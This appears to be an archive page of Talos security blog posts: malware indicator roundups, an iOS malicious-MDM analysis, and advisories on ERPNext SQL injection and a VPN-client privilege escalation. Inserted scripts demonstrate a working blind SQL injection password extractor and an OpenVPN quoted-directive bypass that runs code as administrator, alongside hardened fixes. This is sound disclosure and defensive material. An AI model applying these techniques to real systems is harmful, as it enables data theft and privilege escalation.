  • e3cb0f6d1f1d9dca58775aa58add608f67e32195bd53e9e9c00f720909ed80a1
  • f793a85bfb4cd6ea3d8928d12ce678250a69bb210880901417508d52cca7cc75
  • feee147fb9042914d58c0bdade8a314bb89e710b78cb6d3a9d4511e033e544e0

Coverage


Screenshots of Detection

AMP




ThreatGrid



Umbrella




Win.Malware.Generic-6664552-0


Indicators of Compromise


Registry Keys
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
    • Value Name: Registry Key Name
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
    • Value Name: Hidden
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: Windows Update
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: Microsoft HD Video Card
Mutexes
  • Remcos_Mutex_Inj
  • remcos_fpvcewmpthnemuo
IP Addresses
  • 104[.]16[.]16[.]96
  • 77[.]79[.]239[.]196
Domain Names
  • whatismyipaddress[.]com
  • mail[.]alltracklogistic[.]com
Files and or directories created
  • %LocalAppData%\Temp\subfolder
  • %LocalAppData%\Temp\subfolder\filename.exe
  • %LocalAppData%\Temp\holderwb.txt
  • %AppData%\WindowsUpdate.exe
  • %AppData%\pid.txt
  • %AppData%\pidloc.txt
  • %AppData%\Microsoft\Vault
  • %LocalAppData%\Temp\~DFDC33AF0144AFBF01.TMP
  • %LocalAppData%\Temp\subfolder\filename.vbs
  • %LocalAppData%\Temp\~DF3457B4150AFB88CA.TMP
  • %LocalAppData%\Temp\~DF72CB1D21ECC44F9B.TMP
  • %LocalAppData%\Temp\hkj.exe
  • %LocalAppData%\Temp\~DF0A22527376F8AA09.TMP
  • %LocalAppData%\Temp\install.bat
  • %AppData%\Microsoft HD Video Card\Microsoft HD Video Card.exe
  • %LocalAppData%\Temp\bhv11EA.tmp
File Hashes
  • 051b5663a5fd0aa611ccbbb92e385264b59e9495441b9412edc34ab6903f5177
  • 0a13fbebefbb460de7565dfc7fd6b86674daecd42cfed4626ddcfe303d2b9670
  • 237d9e85b5ebcacc0548757b50563c88e48495c942ecc34ae4dc70fd17f0e56c
  • 43ff3bcd5e6161b482ebe381ccfdd5f25ad22e193172b4fbd2b42848e66fcc84
  • 46fc6e30280595dae36c09e87be036859c91a75ea2cb7b30af667513754b4d61
  • 52b3c994dd4e7d96b1806757af2ffae399559d2d4602facffbe5c20646a5d280
  • 5693932850faa2d97f61a24c1dbf519fc44cc911b148a786a7b322c5d05d3cde
  • 63abb6b27f686a6daf0efbb37ee8a881c70c4a786e69a18761c6aa69be026757
  • 6d32d47f05162c9da374f9d5c1c003022b667a26bc130154fd2e8e785b499b39
  • 6eb4d2104366d234000c4d24c13cf06f1784d428ea5700ab9a3171fb1d2499e1
  • 8af8918383a6e8ae0426630aaafbdccb248d4661e392f0504bbc0dc3d942604c
  • 8c966864d1115d71e2b6e96bb967ab849f6610f338e6fd3022c51fcf897dcd1f
  • 9128bbb89e8497bff023af7f28187e5a9e98ff16534dbd3bbdcc2d5bbfcc66c9
  • b070efa747e400efbf06aae4cc012e7793ca2773827207a773b6406eb5c09212
  • ba06d969cfcc69452153a2f453520cc981680b79402419b018bf97552d1be97a
  • c60c3ac771ccb72ba788e04d4add83786e26dfc54720c5270654b9215acbe0c0
  • dbb9c698f74f9f113a444fba6e17e5c4931f6eebd1739465ea308d74ba827645
  • e5156c3d6ea2b87371fe57aae68d5cc4b63dd0c8f6bcf651c56a2f6906d9f996
  • ed12f4bb9e9157815266d0f14f707d72f72894043bef1116704e7b45e5704a2c
  • f1d8d1363534e62e43213a0b625507aeb24f669ff65efdd6f414f769336b4841
  • f2cdc306085686d1e8f38234f6a8a0ec9cfcc0f00dbcb81106b20807bd1ab5d3
  • fdbb0b36d904b56348382ae39d2ca39347485f1ca6365c87b1b54bb6ea0dbc41

Coverage


Screenshots of Detection

AMP




ThreatGrid


Win.Dropper.Llac-6664551-0


Indicators of Compromise


Registry Keys
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: internat.exe
  • <HKLM>\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
    • Value Name: Policies
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: HKLM
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{537S174K-BM25-YPUH-7HFF-B4DP4K21I7TL}
    • Value Name: StubPath
  • <HKCU>\SOFTWARE\DREGRESS@HOTMAIL.COM
    • Value Name: FirstExecution
  • <HKCU>\SOFTWARE\DREGRESS@HOTMAIL.COM
    • Value Name: NewIdentification
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\EXPLORER_RASAPI32
    • Value Name: EnableFileTracing
Mutexes
  • _SHuassist.mtx
  • WlekOENFlw
  • WlekOENFlw_PERSIST
  • _x_X_BLOCKMOUSE_X_x_
  • _x_X_PASSWORDLIST_X_x_
  • _x_X_UPDATE_X_x_
  • WlekOENFlw_SAIR
IP Addresses
  • N/A
Domain Names
  • dregress[.]no-ip[.]biz
Files and or directories created
  • %LocalAppData%\Temp\XX--XX--XX.txt
  • %AppData%\system32\
  • %AppData%\system32\explorer.exe
  • %LocalAppData%\Temp\UuU.uUu
  • %LocalAppData%\Temp\XxX.xXx
  • %AppData%\logs.dat
File Hashes
  • 5d3e533eddbec63bf8a4e4f55c2c92fdcaf55c48c8ced978fe9b2120ba8c978b
  • 640f20202437cfda4b49cdf95dd3760ec3d76f23e5c473c568835c5e5b5ae721
  • 67d07d8a0a78428347447f235a18804a9d9d814066c9dc4116d1581c2000d5ae
  • 7c86998390a89147d142c1a3914d80cd648bbba9c07dc10a4fb6deee6b81b720
  • 97fabe289c0d778fee300c7b52ad5013ac85bd2a39c3f724d458f4e9268738c6
  • 9817dbfcf5e3136708c26171089ce0b55304a3b2165ddd85d02ee5188de05d41
  • c070bcdf59f548025ad1b12dc1c33699a24963ef7bd4bc88bf29322551dbc440
  • c76f9440d9f992954629a87620da8ef23f2a565870483242cb988eb0aa147743
  • c86b94bcf90b4bb6a6318c22c1eaec125b7329e988fa20bc76e02f072806c288
  • c8e13a8e304358e9b3b337c6a0dd8c8ade371078f153130474f83af7917e845d
  • d90c74e44e999784659ae92d5b4a71095f66eb2a8a750f6fda17976ead3e0658
  • e4cdc7979e494ebd9d7de24955064272bdce61a711f70ff32925b4b47c9320e9

Coverage


Screenshots of Detection

AMP



ThreatGrid



Win.Dropper.Weecnaw-6649176-0


Indicators of Compromise


Registry Keys
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: internat.exe
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: Avast
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{I8877104-6125-5WU7-VAYG-S5K3CM2I1XV8}
    • Value Name: StubPath
Mutexes
  • iTCUfMuY
IP Addresses
  • 91[.]192[.]100[.]3
Domain Names
  • iheuche009[.]hopto[.]org
Files and or directories created
  • %AppData%\Install
  • %AppData%\Install\Host.exe
File Hashes
  • 00e3f5ffeb38495cefce0f1c9522743764adf1ee6ce51b91c9c4726726562a12
  • 01a7bdfdc6502db6bd237fcbc64596d8f76052e942c2c87e897f1ae786b7cac2
  • 02c5fa1012b9cf0d46801cadcc4fe6814b4f75d50104e948031d00ff3ca7b93c
  • 035f91568ca2bad43ce3fde98a2ae0418821e5f558c62b919c786c3b07bc0fe2
  • 03970d185025e7e226c704b5bcd13de89730677345d3d57081d07895966567d4
  • 055865fb005e3969e6d9e7feba2e81a8bedbe3048bf2a9cd3a9fbfe8ea6076e5
  • 063e213ee0ecae95132a3cea557203b782de3c63b753fbd405ed670e83fbf573
  • 081fbe8f1c01676f9765ff7742b5d348433e2fd073136355100fe9f054140e6a
  • 08c257d2e5938dc6539b463ba0689982b79c112c8ad0aaf1be247726622ea487
  • 09c9b81d40f3c97876eaad0f29d7e9694c58c9a9cc4dc38b167611ecfbda3d75
  • 0a032738a8ffc58b6cdce62ef209b247e008f597b6955d87da71e1654da970ef
  • 0afde5386ca8587bca67577727f02c3e71b883b7b5fc72e25a0d542f6c5819c8
  • 0f4fc18209bbb1d979cb504b807142e1a24aa8ee831e33ce8825a5bd350096fa
  • 10427e9a0ee1b4e3d349d61839e1f09cb86b2a68d23e41933127dd5ce2da0134
  • 1343648c8b4748294191cfdca4b4881a57cee96db4051530c514e7c56e1152e3
  • 17983b493cd46b604ef3846516da1cda1628ec855b896be8b54a9558ae83058c
  • 1bb84d812e0863ce21398678bf8facfe6864a33237d67d3416fbcab73226bdbe
  • 1cb1870d583bef0aa1dbb99b30f0819b7490855786a85c5969be925b2719c6be
  • 1fbac835a770d9b309ed87d3df0746bd28f1033f366ab35cde9e165f2b069388
  • 260eaee5c9e8a7effb1698f670464e9b6aad29244dcb16434af489e65adc6d6c
  • 2af2ef163e2035d3503ac8af23ffe8be8ca286dbf9c96aac6c8cebb61e9551c1
  • 2b65d21294f9a06d570811d2e7aeec7ab4785e8840d79e8083791cc3684e4a92
  • 2e7e5b2ac10a3591ab570028b6a230d51f117e1842b6d11f56499785c6faa1c6
  • 2f0184defca0e2583f65e1e6d244a9e3cef8e3c83d02282ef797d97ee784869d
  • 3276ac34b3c9f03cb9f1a259ed09043083e3adeaa82a41fc2dccfc51f20570c7

Coverage


Screenshots of Detection

AMP



ThreatGrid



Umbrella




Malicious MDM: Let's Hide This App

This blog post is authored by Warren Mercer and Paul Rascagneres with contributions from Nick Biasini

Summary


Since our initial discovery of a malicious mobile device management (MDM) platform that was loading fake applications onto smartphones, we have gained greater insight into the attacker's methods. We now know how the attacker took advantage of a common MDM feature and used an iOS profile to hide and disable the legitimate versions of the apps to force the use of the malicious stand-ins.

Cisco Talos previously published two articles (here and here) on the subject. In the aforementioned campaigns, the attackers enrolled iOS devices into the MDM and used it to control the victims' devices, deploying malicious apps disguised as the messaging services WhatsApp, Telegram and Imo, as well as the web browser Safari.

After additional research, we now know how the malicious apps were forced on the victims: the attacker deployed a profile on the enrolled devices that abused the age rating restriction built into iOS. On the App Store, WhatsApp is rated 12-plus and Telegram 17-plus. Once the profile capped allowed apps at 9-plus, the legitimate installed applications disappeared from the device:






The app still exists on the device; however, the user cannot interact with it, even when searching for it with the iOS search function. It simply does not open.

All mobile device users should be aware of these attack methods so as to prevent attackers from gaining control of their phones through an MDM. In the text and videos below, we walk through checking your phone for an unauthorized MDM and for changes to the age rating settings.

More details on the profile setup


In the iOS ecosystem, devices are configured using profiles: XML (property list) files that can be distributed to iOS devices. The MDM enrollment mechanism itself, for example, is performed with a profile. Profiles are easily created with Apple's official Apple Configurator 2 tool, and among other things they can restrict app usage:



As the screenshot shows, the per-app restriction is limited to supervised devices. In our investigation, the enrolled iPhones were not in supervised mode, yet the legitimate WhatsApp application still disappeared, forcing the user onto the malicious one. How?

The attackers used the age rating instead: they capped the allowed app rating at 9-plus, which forbids any app rated 12-plus or 17-plus:



Here is the capture of the XML content of the profile hosted on the malicious MDM:

<key>ratingApps</key>
<integer>200</integer>
<key>ratingMovies</key>
<integer>1000</integer>
<key>ratingRegion</key>
<string>us</string>
<key>ratingTVShows</key>
<integer>1000</integer>

In this context, the 200 equates to the "age 9-plus" rating.
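As an added example (not code from the original post or from Apple), the following Python parses a .mobileconfig profile with the standard library's plistlib, reports the app age rating it enforces, and lists which of the apps named above would vanish under it. The sample profile is constructed to mirror the keys quoted above; its identifiers and UUIDs are made up, and the full mapping of ratingApps values to ages follows Apple's Configuration Profile Reference (the post itself confirms only that 200 means 9-plus).

```python
import plistlib

# Apple's numeric scale for the ratingApps key of a Restrictions payload
# (PayloadType com.apple.applicationaccess). The post confirms 200 == "9+";
# the remaining values follow Apple's Configuration Profile Reference.
APP_RATING_LABELS = {
    0: "no apps allowed",
    100: "4+",
    200: "9+",
    300: "12+",
    600: "17+",
    1000: "all apps",
}
ALLOW_ALL = 1000

# App Store age ratings of the apps the attackers replaced, as given in the post.
INSTALLED_APP_RATINGS = {"WhatsApp": 300, "Telegram": 600}


def app_rating_limit(profile_bytes):
    """Return (ratingApps, ratingRegion) from the first Restrictions payload
    in a .mobileconfig, or None when the profile sets no app rating."""
    profile = plistlib.loads(profile_bytes)
    for payload in profile.get("PayloadContent", []):
        if payload.get("PayloadType") == "com.apple.applicationaccess" \
                and "ratingApps" in payload:
            return int(payload["ratingApps"]), payload.get("ratingRegion", "?")
    return None


def hidden_apps(limit, installed=INSTALLED_APP_RATINGS):
    """Apps rated above the allowed ceiling stay installed, but their icons
    vanish from the springboard and they can no longer be launched."""
    return sorted(name for name, rating in installed.items() if rating > limit)


def audit_profile(profile_bytes):
    """Summarise whether a profile hides apps through the age rating."""
    found = app_rating_limit(profile_bytes)
    if found is None:
        return {"restricted": False}
    limit, region = found
    return {
        "restricted": limit < ALLOW_ALL,
        "limit": limit,
        "label": APP_RATING_LABELS.get(limit, "unknown"),
        "region": region,
        "hidden_apps": hidden_apps(limit),
    }


# Constructed sample mirroring the keys quoted in the post. Identifiers and
# UUIDs are made up for the example.
MALICIOUS_PROFILE = plistlib.dumps({
    "PayloadType": "Configuration",
    "PayloadVersion": 1,
    "PayloadIdentifier": "example.hide-apps",
    "PayloadUUID": "11111111-2222-4333-8444-555555555555",
    "PayloadDisplayName": "Settings",
    "PayloadContent": [{
        "PayloadType": "com.apple.applicationaccess",
        "PayloadVersion": 1,
        "PayloadIdentifier": "example.hide-apps.restrictions",
        "PayloadUUID": "11111111-2222-4333-8444-666666666666",
        "ratingApps": 200,
        "ratingMovies": 1000,
        "ratingRegion": "us",
        "ratingTVShows": 1000,
    }],
})

# A profile with no Restrictions payload, for comparison (also constructed).
BENIGN_PROFILE = plistlib.dumps({
    "PayloadType": "Configuration",
    "PayloadVersion": 1,
    "PayloadIdentifier": "example.benign",
    "PayloadUUID": "11111111-2222-4333-8444-777777777777",
    "PayloadContent": [],
})

if __name__ == "__main__":
    for name, blob in (("malicious", MALICIOUS_PROFILE), ("benign", BENIGN_PROFILE)):
        print(name, audit_profile(blob))
```

This check is for a profile file you already hold, such as one captured from an MDM server as the XML above was; pulling a profile off a device for offline review is a separate step.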

Once this profile is installed on the iOS device, the applications above the allowed age rating stay installed but can no longer be used or accessed, and their icons disappear from the springboard. The App Store still shows the application as installed, but the user cannot launch it. You can check the restriction settings on your device:



The restrictions are displayed as "disabled," which is why the text is grey. In fact, the restriction is enabled and enforced.



If the profile is installed manually via Apple Configurator, or by opening the profile XML from Safari, a new entry will appear in the Settings > General > Profile menu. If the MDM deploys the profile, it does not appear (the MDM enrollment profile will be present).

How to check iPhone profiles


In the videos below, we are going to show you how an attacker can obtain access to your phone by enrolling you in a malicious MDM platform. You'll notice there is a fair amount of user interaction involved. However, if the attacker can correctly socially engineer a user via a phone call, or if they have physical access to the device, enrollment can be quick and effective.

The first video shows the enrollment process from an end user's perspective. We have carried out this test on an iPhone X running the latest 11.4.1 iOS from Apple. The lab phone used is not jailbroken or tampered with in any way. It's an iPhone X fresh out of the box updated to the latest iOS.



As the video shows, the user accepts a couple of INSTALL/TRUST prompts to allow the phone to be enrolled. Once the phone was enrolled in the malicious MDM, we could push profiles and applications to the device. We pushed a profile carrying the age restriction detailed earlier, which made the legitimate WhatsApp application disappear, and then used our MDM access to push a malicious version of WhatsApp to the phone.

It is important to note that no malware, vulnerability or zero-day is used to enroll the phone in the MDM. This is a legitimate device administration method used within enterprises throughout the world; the attacker has merely leveraged it.

Talos recommends the following methods to check whether your phone has additional profiles or is enrolled in an MDM platform:

1. Users can view restrictions set by MDM profiles in Settings > General > Profiles & Device Management > [MDM configuration] > Restrictions

2. Users can also check which applications a MDM profile installed on their device in Settings > General > Profiles & Device Management > [MDM configuration] > Apps.

Note: If you do not have any PROFILE & DEVICE MANAGEMENT menu option available, this means the phone is currently not enrolled in an MDM, nor are there any additional profiles trusted on the phone.



Conclusion


When most consumers think about malware on their mobile devices, they usually assume a patch is needed to fix a bug or vulnerability. This technique, however, exploits no vulnerability. It is an existing, legitimate feature that this threat actor used to hide the victim's legitimate applications while deploying malicious versions in their place. Once the user enrolls in the MDM, the technique is completely opaque to them.

An MDM can silently deploy a profile. Therefore, we strongly recommend that iPhone profiles are audited and suspicious profiles deleted. Additionally, check the restrictions menu on your phone to verify whether an age rating is configured.

Vulnerability Spotlight: TALOS-2018-0560 - ERPNext SQL Injection Vulnerabilities

Vulnerabilities discovered by Yuri Kramar from the Cisco Security Advisor Team


Overview

Talos is disclosing multiple SQL injection vulnerabilities in version 10.1.6 of Frappe ERPNext, an open-source enterprise resource planning (ERP) cloud application. These vulnerabilities allow an attacker to bypass authentication and gain unauthenticated access to sensitive data. A normal web browser is sufficient to trigger them; no special tools are required.

Details

The vulnerabilities were assigned the CVE IDs CVE-2018-3882 through CVE-2018-3885. An attacker can inject SQL through the following parameters of the listed request handlers:

CVE-2018-3882 - searchfield parameter
query=erpnext.controllers.queries.

CVE-2018-3883 - employee parameter
cmd=erpnext.hr.doctype.leave_application.leave_application.

CVE-2018-3883 - sort_order parameter
cmd=erpnext.stock.dashboard.item_dashboard.

CVE-2018-3884 - sort_by parameter 
cmd=erpnext.stock.dashboard.item_dashboard.

CVE-2018-3884 - start parameter
cmd=erpnext.stock.dashboard.item_dashboard.

CVE-2018-3885
cmd=frappe.desk.reportview.

More technical details can be found in the Talos vulnerability reports.
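The post does not include payloads. As an added illustration (not code from Talos or ERPNext), the following Python script models the pattern behind the sort_by/sort_order style of injection listed above: a hypothetical dashboard handler formats request parameters into the ORDER BY clause, where bind parameters cannot be used, and an attacker turns the resulting row order into a boolean oracle that reads a credential from another table one character at a time, using nothing more than ordinary requests. A hardened version of the same handler follows. The tables, their contents and the handler names are constructed for the example, and it runs against an in-memory SQLite database rather than a real ERPNext instance.

```python
import sqlite3


def make_db():
    """Constructed sample data: an inventory table exposed by the handler and a
    credential table the attacker is not supposed to reach."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE item (name TEXT, qty INTEGER);
        INSERT INTO item VALUES ('bolt', 12), ('nut', 5);
        CREATE TABLE auth (user TEXT, password TEXT);
        INSERT INTO auth VALUES ('Administrator', 'hunter2');
        """
    )
    return conn


def get_data_vulnerable(conn, sort_by, sort_order, start):
    """Hypothetical dashboard handler: request parameters are pasted straight
    into ORDER BY / OFFSET. Identifiers and keywords cannot be bound as
    parameters, which is why this pattern is so common."""
    sql = "SELECT name, qty FROM item ORDER BY {} {} LIMIT 20 OFFSET {}".format(
        sort_by, sort_order, start
    )
    return conn.execute(sql).fetchall()


def oracle(conn, condition):
    """Boolean oracle through ORDER BY: sort by qty when the condition holds
    (nut comes first) and by name otherwise (bolt comes first). No error
    message and no UNION are needed; only the row order leaks."""
    payload = "(CASE WHEN ({}) THEN qty ELSE name END)".format(condition)
    rows = get_data_vulnerable(conn, payload, "ASC", 0)
    return rows[0][0] == "nut"


def extract_password(conn, max_len=32):
    """Recover the administrator password one character at a time."""
    charset = "abcdefghijklmnopqrstuvwxyz0123456789"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            cond = (
                "(SELECT substr(password, {}, 1) FROM auth "
                "WHERE user='Administrator') = '{}'"
            ).format(pos, ch)
            if oracle(conn, cond):
                recovered += ch
                break
        else:
            break  # no character matched: end of the string
    return recovered


ALLOWED_SORT_BY = {"name", "qty"}
ALLOWED_SORT_ORDER = {"ASC", "DESC"}


def get_data_hardened(conn, sort_by, sort_order, start):
    """Same query, but sort_by/sort_order are checked against an allowlist of
    column names and keywords, and the numeric offset is bound as a parameter."""
    if sort_by not in ALLOWED_SORT_BY:
        raise ValueError("invalid sort_by")
    if sort_order.upper() not in ALLOWED_SORT_ORDER:
        raise ValueError("invalid sort_order")
    sql = "SELECT name, qty FROM item ORDER BY {} {} LIMIT 20 OFFSET ?".format(
        sort_by, sort_order.upper()
    )
    return conn.execute(sql, (int(start),)).fetchall()


def hardened_rejects(conn, sort_by, sort_order="ASC", start="0"):
    """True if the hardened handler refuses the given parameters."""
    try:
        get_data_hardened(conn, sort_by, sort_order, start)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("leaked via ORDER BY:", extract_password(db))  # hunter2
    print("hardened rejects payload:",
          hardened_rejects(db, "(CASE WHEN 1 THEN qty ELSE name END)"))
```

The allowlist is the important part of the fix: escaping does not help for identifiers or keywords, so the handler must map user input onto a fixed set of permitted column names and sort directions and bind every value that can be bound.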

Coverage

The following Snort rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rule: 46165-46172





Vulnerability Spotlight: CVE-2018-3952 / CVE-2018-4010 - Multi-provider VPN Client Privilege Escalation Vulnerabilities

Discovered by Paul Rascagneres.


Overview


Cisco Talos has discovered two similar vulnerabilities in the ProtonVPN and NordVPN Windows clients. They allow an attacker with a standard user account to execute code as an administrator on Microsoft Windows. The vulnerabilities were assigned the IDs TALOS-2018-0622 / CVE-2018-3952 (NordVPN) and TALOS-2018-0679 / CVE-2018-4010 (ProtonVPN).

The vulnerabilities are similar to a bug discovered by VerSprite in April 2018, CVE-2018-10169. That same month, both vendors released near-identical patches for that flaw. However, we identified a way to bypass the patch: despite the fix, a standard user can still execute code as an administrator. The Details section below explains the first patch, why it was insufficient, and how the vendors finally fixed the problem.




Details


VPN clients' design


To understand the vulnerabilities, we first need to understand the design of the VPN clients mentioned in this article. Both clients have the same design:

  • The user interface. This binary is executed with the permission of the logged-in user. The purpose of this application is to allow the user to select the VPN configuration, such as the protocol, the location of the VPN server, etc. The information is sent to a service when the user clicks on "connect" (it's, in fact, an OpenVPN configuration file).
  • The service. This binary is used to receive orders from the user interface. For example, it receives the VPN configuration file from the user. The goal of the binary is to execute the OpenVPN client binary with the user configuration file (with administrator privileges).


The vulnerabilities in this article abuse the service and allow the standard user to execute arbitrary commands through OpenVPN with administrator privileges.

Initial vulnerability


The first vulnerability, CVE-2018-10169, was discovered by VerSprite. The author shows that an OpenVPN configuration file with the following content can be sent to the service:
plugin path\\OpenVPN_PoC.dll
The service hands this configuration to OpenVPN unchanged. As a result, OpenVPN_PoC.dll is loaded and executed by OpenVPN with administrator privileges.

First patch and limitation


ProtonVPN and NordVPN shipped the same patch. They added a check on the content of the OpenVPN configuration sent by the user:
// First patch: reject a line that begins with one of the code-execution directives
if (!text.StartsWithIgnoringCase("<tls-auth>") &&
    !text.StartsWithIgnoringCase("<ca>") &&
    (OpenVpnConfigSecurityValidator.StartsWithName(text, "plugin") ||
     OpenVpnConfigSecurityValidator.StartsWithName(text, "script-security") ||
     OpenVpnConfigSecurityValidator.StartsWithName(text, "up") ||
     OpenVpnConfigSecurityValidator.StartsWithName(text, "down")))
{
    reason = string.Format("Invalid configuration file. Reason: {0}", text);
    return false;
}
This code rejects a configuration line that starts with plugin, script-security, up or down. These are the OpenVPN directives the vendors identified as ways to execute code or commands through OpenVPN.

Here is the code of the check:
private static bool StartsWithName(string line, string name)
{
    // Matches "name " or "name\t" at the start of the line, or a line consisting of the name alone
    return line.StartsWithIgnoringCase(name + " ") ||
           line.StartsWithIgnoringCase(name + "\t") ||
           line.EqualsIgnoringCase(name);
}
The helper matches the keyword only when it is followed by a space or a tab, or when it makes up the whole line, so a tab-separated variant such as "up<TAB>..." is caught as well as the space-separated one.

However, reading the OpenVPN source code of the configuration file parser (the parse_line() function), we see that a keyword can be enclosed in quotation marks. The check above looks only at the raw first characters of the line, so we can add the following lines to the configuration file:
"script-security" 2
"up" C:\\WINDOWS\\system32\\notepad.exe
OpenVPN accepts this configuration, and it passes the validation check of both VPN services.


The service executes OpenVPN, which in turn executes notepad.exe with administrator privileges.
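To make the bypass concrete, here is an added Python model (not the vendors' code) of both the first patch's check and OpenVPN's quote-aware line tokenization. tokenize_openvpn_line() is a simplified reading of parse_line(): whitespace separates tokens, single or double quotes group a token, a backslash escapes the next character, and "#" or ";" at the start of a token begins a comment. The constructed configurations show that the original PoC is rejected, that the quoted variant slips past the first patch, and that a validator which tokenizes before testing the first token catches both. The server name in the sample configurations is an assumption.

```python
CODE_EXEC_DIRECTIVES = ("plugin", "script-security", "up", "down")


def starts_with_name(line, name):
    """Python rendering of the StartsWithName helper from the first patch."""
    low, n = line.lower(), name.lower()
    return low.startswith(n + " ") or low.startswith(n + "\t") or low == n


def first_patch_validator(config):
    """Line-by-line check equivalent to the first patch: (accepted, reason)."""
    for text in config.splitlines():
        low = text.lower()
        if low.startswith("<tls-auth>") or low.startswith("<ca>"):
            continue
        if any(starts_with_name(text, d) for d in CODE_EXEC_DIRECTIVES):
            return False, "Invalid configuration file. Reason: {}".format(text)
    return True, None


def tokenize_openvpn_line(line):
    """Simplified model of OpenVPN's parse_line(): whitespace-separated tokens,
    quotes group a token, backslash escapes the next character, and a token
    starting with '#' or ';' begins a comment."""
    tokens, cur, quote, i = [], None, None, 0
    while i < len(line):
        c = line[i]
        if quote is not None:
            if c == "\\" and i + 1 < len(line):
                i += 1
                cur += line[i]
            elif c == quote:
                quote = None  # closing quote; the token continues until whitespace
            else:
                cur += c
        elif c in " \t\r\n":
            if cur is not None:
                tokens.append(cur)
                cur = None
        elif c in "\"'":
            quote = c
            if cur is None:
                cur = ""
        elif c in "#;" and cur is None:
            break
        elif c == "\\" and i + 1 < len(line):
            i += 1
            cur = (cur or "") + line[i]
        else:
            cur = (cur or "") + c
        i += 1
    if cur is not None:
        tokens.append(cur)
    return tokens


def hardened_validator(config):
    """Tokenize the way OpenVPN does, then judge the first token, so quoting
    can no longer hide a directive. Returns (accepted, offending_directive)."""
    for line in config.splitlines():
        tokens = tokenize_openvpn_line(line)
        if tokens and tokens[0].lower() in CODE_EXEC_DIRECTIVES:
            return False, tokens[0].lower()
    return True, None


# Constructed configurations; vpn.example.invalid is an assumed server name.
ORIGINAL_POC_CONFIG = r'''client
dev tun
remote vpn.example.invalid 1194 udp
plugin path\\OpenVPN_PoC.dll
'''

BYPASS_CONFIG = r'''client
dev tun
remote vpn.example.invalid 1194 udp
"script-security" 2
"up" C:\\WINDOWS\\system32\\notepad.exe
'''

if __name__ == "__main__":
    print("first patch, original PoC:", first_patch_validator(ORIGINAL_POC_CONFIG))
    print("first patch, quoted bypass:", first_patch_validator(BYPASS_CONFIG))
    print("hardened, quoted bypass:   ", hardened_validator(BYPASS_CONFIG))
```

The general lesson is that a validator must see the input the same way the consumer does: checking raw text against a denylist fails as soon as the consumer's parser accepts an alternative spelling. Even the tokenizing version is still a denylist, and the vendors' final fix (not accepting a user-supplied configuration at all) removes the attack surface rather than filtering it.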

New patches


The new patches developed by the two vendors differ. ProtonVPN now stores the OpenVPN configuration file in the installation directory, which a standard user cannot modify, so the malicious directives can no longer be added. NordVPN instead generates the OpenVPN configuration file from an XML template that a standard user cannot edit.

More details can be found in the vulnerability reports:


Tested Versions:


  • ProtonVPN VPN Client 1.5.1
  • NordVPN 6.14.28.0


Coverage


The following Snort rules will detect exploitation attempts. Additional rules may be released at a future date, and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 47035 - 47036


Threat Roundup for August 31 to September 7


Today, as we do every week, Talos is giving you a glimpse into the most prevalent threats we’ve observed this week — covering the dates between Aug. 31 and Sept. 7. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, we will summarize the threats we’ve observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this round up are:

  • Win.Dropper.Generickdz-6671833-0
    Dropper
    This is a BobSoft Delphi application that wraps malware. In the current campaign, the HawkEye spyware is installed. The malware uses process hollowing to keep itself hidden from detection, and achieves persistence across reboots by leveraging an autostart key in the Windows registry.
     
  • Win.Dropper.Kovter-6669952-0
    Dropper
    Win.Dropper.Kovter-6669952-0 is a dropper written in Visual Basic. It is distributed via email, and makes use of PowerShell scripts and large objects in the registry to conceal its embedded malware.
     
  • Win.Dropper.Upatre-6669126-0
    Dropper
    Win.Dropper.Upatre-6669126-0 is dropped by a Word document in our ThreatGrid sandbox. The sample likely performs code injection, bypassing Windows DEP by allocating memory pages with PAGE_EXECUTE_READWRITE permissions.
     
  • Doc.Dropper.Valyria-6668024-0
    Dropper
    Doc.Dropper.Valyria-6668024-0 is a malicious Word document that drops malware. The campaign currently spreads the Emotet malware.
     
  • Doc.Dropper.Chronos-6667983-0
    Dropper
    This malicious Word document was discovered after it dropped an executable in our ThreatGrid sandbox. The campaign currently delivers a banking trojan, which will redirect internet traffic through the malware's proxy and try to steal banking credentials.
     
  • Win.Packed.Generic-6667111-0
    Packed
    This is a Visual Basic executable that will change proxy settings on the victim's machine to inspect internet traffic and thus steal information. It also tries to steal local passwords from the browser's password database.
     

Threats

Win.Dropper.Generickdz-6671833-0


Indicators of Compromise


Registry Keys
  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\33fd244257221b4aa4a1d9e6cacf8474
